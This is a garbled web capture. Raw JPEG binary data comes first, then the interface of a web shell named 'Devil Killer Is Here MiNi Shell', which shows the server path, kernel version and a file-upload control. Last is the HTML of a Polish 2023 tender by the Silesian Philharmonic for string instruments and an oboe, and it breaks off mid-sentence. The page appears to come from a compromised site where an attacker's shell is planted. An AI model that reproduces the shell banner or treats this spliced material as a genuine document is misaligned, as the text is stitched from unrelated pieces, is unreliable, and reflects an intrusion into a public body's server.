JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231019/0045323101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup instrumentów i akcesoriów muzycznych dla Filharmonii Śląskiej <br/>im. Henryka Mikołaja Góreckiego – wiolonczela, skrzypce, obój, smyczki </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Filharmonia Śląska im. Henryka Mikołaja Góreckiego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000279338</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sokolska 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-084</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 351 1719</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@filharmonia-slaska.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://filharmonia-slaska.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup instrumentów i akcesoriów muzycznych dla Filharmonii Śląskiej <br/>im. Henryka Mikołaja Góreckiego – wiolonczela, skrzypce, obój, smyczki </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c8199993-6e94-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00453231</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00112626/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup instrumentów i akcesoriów muzycznych dla Filharmonii Śląskiej im. Henryka Mikołaja Góreckiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.platformazakupowa.pl/pn/filharmonia_slaska <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się drogą elektroniczną przy użyciu platformy zakupowej pod adresem:<br/>https://platformazakupowa.pl/pn/filharmonia_slaska.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, zobowiązany jest posiadać konto na Platformie zakupowej. Rejestracja i utrzymanie konta oraz korzystanie z Platformy zakupowej są bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej opisane zostały w Regulaminie na www.platformazakupowa.pl.<br/>Limit objętości plików lub spakowanych folderów w zakresie całej oferty wynosi 150 MB.<br/>Do złożenia oferty, oświadczeń, o których mowa w art. 125 ust. 1 uPzp oraz innych oświadczeń i dokumentów obowiązkowa jest forma elektroniczna lub postać elektroniczna, opatrzona kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>Instrukcje korzystania z platformy zakupowej dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>Szczegółowe informacje o ŚRODKACH KOMUNIKACJI ELEKTRONICZNEJ, PRZY UŻYCIU KTÓRYCH ZAMAWIAJĄCY BĘDZIE KOMUNIKOWAŁ SIĘ Z WYKONAWCAMI ORAZ WYMAGANIACH TECHNICZNYCH I ORGANIZACYJNYCH SPORZĄDZENIA, WYSYŁANIA I ODBIERANIA KORESPONDENCJI ELEKTRONICZNEJ znajdują się w Rozdziale 9 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>1.	Administratorem danych osobowych Wykonawców i osób uczestniczących w przedmiotowym postępowaniu jest Zamawiający.<br/>2.	Zamawiający wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować w sprawach dotyczących przetwarzania danych osobowych pod adresem e-mail: iod@filharmonia-slaska.eu.<br/>3.	Dane osobowe Wykonawców i osób uczestniczących w przedmiotowym postępowaniu przetwarzane będą na podstawie: <br/>a)	art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia.<br/>b)	art. 6 ust. 1 lit. b RODO w celu związanym z zawarciem umowy lub działaniami zmierzającymi do jej zawarcia.<br/>c)	art. 6 ust. 1 lit. f RODO w celach archiwalnych , dochodzenia roszczeń lub obrony przed roszczeniami lub wypełnienia obowiązków wynikających z innych przepisów.<br/>4.	Odbiorcami danych osobowych Wykonawców i osób uczestniczących w przedmiotowym postępowaniu będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w opar-ciu o art. 8 oraz art. 96 ust. 3 uPzp. <br/>5.	Dane osobowe osób uczestniczących w przedmiotowym postępowaniu będą przechowywane, zgodnie z art. 97 ust. 1 uPzp, przez okres 4 lat od dnia zakończenia postępowania.<br/>6.	Obowiązek podania przez Wykonawcę danych osobowych bezpośrednio jego dotyczących oraz danych osób uczestniczących w postępowaniu jest wymogiem ustawowym określonym w przepisach uPzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z upup. <br/>7.	W odniesieniu do danych osobowych osób uczestniczących w przedmiotowym postępowaniu decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>8.	Osoby uczestniczące w przedmiotowym postępowaniu posiadają:<br/>a)	prawo dostępu do danych osobowych bezpośrednio ich dotyczących na podstawie art. 15 RODO. W przypadku gdy wykonanie przez Zamawiającego obowiązków, o których mowa w art. 15 ust. 1-3 RODO, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>b)	W przypadku zakończonego postępowania o udzielenie zamówienia, gdy wykonanie przez Zamawiającego obowiązków, o których mowa w art. 15 ust. 1-3 RODO, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania;<br/>c)	prawo do sprostowania przez Wykonawcę uczestniczącego w przedmiotowym postępowaniu danych osobowych na podstawie art. 16 RODO (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z uPzp oraz nie może naruszać integralności protokołu i jego załączników);<br/>d)	prawo żądania od administratora ograniczenia przetwarzania danych osobowych na podstawie art. 18 RODO z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego). Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wykonawcy i osobom uczestniczącym w przedmiotowym postępowaniu nie przysługuje prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w sprawie naruszenia przepisów RODO dotyczących:<br/>a)	prawa do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO;<br/>b)	prawa do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	prawa sprzeciwu wobec przetwarzania danych osobowych na podstawie art. 21 RODO, gdyż podstawą prawną przetwarzania danych osobowych Wykonawców i osób uczestniczących w przedmiotowym postępowaniu jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/ZP/AT/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 565000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wiolonczela klasy mistrzowskiej wykonana przez Mathiasa Heinicke lub równoważna z certyfikatem oryginalności posiadająca niżej wymienione cechy:<br/>•	Tylna plyta i boczki wykonane z dwóch kawałków średnio usłojonego, ognistego klonu<br/>•	Przednia płyta wykonana z dwóch kawałków bardzo gęstego świerku<br/>•	Lakier: pomarańczowo- brązowy z lekko brązowym podkładem<br/>•	Podstrunnica: hebanowa<br/>•	Wymiary instrumentu: <br/>długość pudła: 750 mm <br/>szerokość w najszerszym miejscu powyżej górnych rogów: ok. 340 mm <br/>szerokość w talii: ok. 240 mm <br/>szerokość w najszerszym miejscu pod dolnymi rogami: ok. 435 mm<br/>•	Wykończenie: posrebrzane<br/>•	Futerał: Schagerl lub równoważny </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 139000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37313800-3 - Wiolonczele</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Wybór najkorzystniejszej oferty dla następujących części zamówienia:<br/>będzie dokonany na podstawie następujących kryteriów:<br/>a) ceny (C)	- 40 %<br/>b) jakości (J)	- 60 %<br/><br/>Zasady przyznawania punktów: <br/>a)	Punktacja za zaproponowaną cenę (C): <br/><br/> min. wartość zaproponowana w ofertach<br/>C = ------------------------------------------------------------------------- x 100 pkt <br/> wartość badanej oferty<br/><br/>b)	Punktacja za „jakość” (J) obejmuje następujące elementy: <br/>i) Intonacja: wysokość dźwięku określana pod kątem sprawdzenia równych stosunków częstotliwości (interwałów), mierzona poprzez badanie przyrządem pomiaru częstotliwości fali akustycznej. <br/>do 10 centów 20 pkt<br/>od 10 do 25 centów 10 pkt<br/>powyżej 25 centów 0 pkt <br/>Maksymalna dopuszczalna wartość centów = 25<br/>ii) Wyrównanie brzmienia: Sprawdzenie pasma tonów harmonicznych dźwięku określone oceną na podstawie analizy wrażenia słuchowego muzyków, w całej skali instrumentu. Zgodność długości brzmienia i głośności na każdym poziomie skali instrumentu.<br/>wyrównany 40 pkt<br/>średnio wyrównany 20 pkt<br/>niewyrównany 0 pkt<br/>Minimalna dopuszczalna ilość punktów =20.<br/>iii) Barwa: ocena aspektów barwy na podstawie analizy wrażenia barwy zdefiniowanego semantycznym opisem. <br/>ciepła 0 - 4 pkt <br/>czysta 0 - 4 pkt <br/>głęboka 0 - 4 pkt <br/>jasna 0 - 4 pkt <br/>nośna 0 - 4 pkt <br/>Minimalna dopuszczalna ilość punktów w każdym z powyższych podkryteriów = 2.<br/>iv) Precyzja mechaniki : właściwa precyzja mechaniki charakterystyczna dla danego rodzaju instrumentu.<br/>maksymalnie właściwa precyzja mechaniki 20 pkt <br/>średnia precyzja mechaniki 10 pkt <br/>brak właściwej precyzji mechaniki 0 pkt <br/>Minimalna dopuszczalna ilość punktów = 10.<br/>Ocena za jakość dokonywana jest w pełnych punktach.<br/>Ogólna punktacja za jakość : J = Ji+Jii+Jiii+Jiv<br/>Oceny każdego z instrumentów będzie dokonywać dwóch wskazanych przez Zamawiającego biegłych. <br/>Wykonawca udostępni biegłym instrumenty w uzgodnionym miejscu i czasie w celu dokonania oceny wg kryterium „jakość”. Udostępnione instrumenty powinny być tożsame z oferowanymi. <br/>Na podstawie opinii biegłych członko¬wie komisji przetargowej przydzielą każdej ocenianej ofercie punkty w kryterium „jakość” w skali jak wyżej. <br/>Ocena końcowa oferty W zostanie wyliczona ze wzoru: W= C x 40% + J x 60%<br/>gdzie: W	- wynik ostateczny oceny oferty<br/>C	- wynik za kryterium cena wyliczony zgodnie ze wzorem podanym w pkt a)<br/>J	- wynik za kryterium jakość wyliczony zgodnie ze wzorem podanym w pkt b)<br/>Wynik oceny zostanie zaokrąglony do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup 2 szt. skrzypiec klasy mistrzowskiej.<br/>Skrzypce 1<br/>Skrzypce francuskie klasy mistrzowskiej z pracowni Paula Blancharda z certyfikatem autentyczności lub równoważne posiadające niżej wymienione cechy:<br/>•	Tylna płyta oraz boczki wykonane z jednego kawałka wyselekcjonowanego klonu<br/>•	Przód wykonany w dwóch kawałkach średnio usłojonego świerku <br/>•	Lakier: czerwono-pomarańczowy ze złotymi refleksami.<br/>•	Podstrunnica: hebanowa<br/>•	Wymiary: <br/>długość pudła: ok. 355 mm<br/>szerokość: w najszerszym miejscu powyżej górnych rogów: ok. 165 mm<br/>szerokość w najszerszym miejscu pod dolnymi rogami: ok. 205 mm<br/>•	W komplecie futerał<br/>•	Wymagany certyfikat lub oświadczenie producenta, że drewno było sezonowane.<br/> <br/>Skrzypce 2<br/>Skrzypce niemieckie klasy mistrzowskiej z pracowni Michaela Klotza lub równoważne posiadające niżej wymienione cechy:<br/>•	Tylna płyta oraz boczki wykonana z jawora falistego<br/>•	Przednia płyta wykonana z gęstego świerku <br/>•	Lakier: w kolorze żółto-złocistym.<br/>•	Podstrunnica: hebanowa<br/>•	Wymiary: <br/>długość pudła: ok. 365 mm<br/>szerokość w najszerszym miejscu powyżej górnych rogów: ok. 165 mm<br/>szerokość w talii: 108 mm<br/>szerokość w najszerszym miejscu pod dolnymi rogami: ok. 205 mm<br/>•	W komplecie futerał<br/>•	Wymagany certyfikat lub oświadczenia producenta, że drewno było sezonowane. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 230000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37313400-9 - Skrzypce</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Wybór najkorzystniejszej oferty dla następujących części zamówienia:<br/>będzie dokonany na podstawie następujących kryteriów:<br/>a) ceny (C)	- 40 %<br/>b) jakości (J)	- 60 %<br/><br/>Zasady przyznawania punktów: <br/>a)	Punktacja za zaproponowaną cenę (C): <br/><br/> min. wartość zaproponowana w ofertach<br/>C = ------------------------------------------------------------------------- x 100 pkt <br/> wartość badanej oferty<br/><br/>b)	Punktacja za „jakość” (J) obejmuje następujące elementy: <br/>i) Intonacja: wysokość dźwięku określana pod kątem sprawdzenia równych stosunków częstotliwości (interwałów), mierzona poprzez badanie przyrządem pomiaru częstotliwości fali akustycznej. <br/>do 10 centów 20 pkt<br/>od 10 do 25 centów 10 pkt<br/>powyżej 25 centów 0 pkt <br/>Maksymalna dopuszczalna wartość centów = 25<br/>ii) Wyrównanie brzmienia: Sprawdzenie pasma tonów harmonicznych dźwięku określone oceną na podstawie analizy wrażenia słuchowego muzyków, w całej skali instrumentu. Zgodność długości brzmienia i głośności na każdym poziomie skali instrumentu.<br/>wyrównany 40 pkt<br/>średnio wyrównany 20 pkt<br/>niewyrównany 0 pkt<br/>Minimalna dopuszczalna ilość punktów =20.<br/>iii) Barwa: ocena aspektów barwy na podstawie analizy wrażenia barwy zdefiniowanego semantycznym opisem. <br/>ciepła 0 - 4 pkt <br/>czysta 0 - 4 pkt <br/>głęboka 0 - 4 pkt <br/>jasna 0 - 4 pkt <br/>nośna 0 - 4 pkt <br/>Minimalna dopuszczalna ilość punktów w każdym z powyższych podkryteriów = 2.<br/>iv) Precyzja mechaniki : właściwa precyzja mechaniki charakterystyczna dla danego rodzaju instrumentu.<br/>maksymalnie właściwa precyzja mechaniki 20 pkt <br/>średnia precyzja mechaniki 10 pkt <br/>brak właściwej precyzji mechaniki 0 pkt <br/>Minimalna dopuszczalna ilość punktów = 10.<br/>Ocena za jakość dokonywana jest w pełnych punktach.<br/>Ogólna punktacja za jakość : J = Ji+Jii+Jiii+Jiv<br/>Oceny każdego z instrumentów będzie dokonywać dwóch wskazanych przez Zamawiającego biegłych. <br/>Wykonawca udostępni biegłym instrumenty w uzgodnionym miejscu i czasie w celu dokonania oceny wg kryterium „jakość”. Udostępnione instrumenty powinny być tożsame z oferowanymi. <br/>Na podstawie opinii biegłych członko¬wie komisji przetargowej przydzielą każdej ocenianej ofercie punkty w kryterium „jakość” w skali jak wyżej. <br/>Ocena końcowa oferty W zostanie wyliczona ze wzoru: W= C x 40% + J x 60%<br/>gdzie: W	- wynik ostateczny oceny oferty<br/>C	- 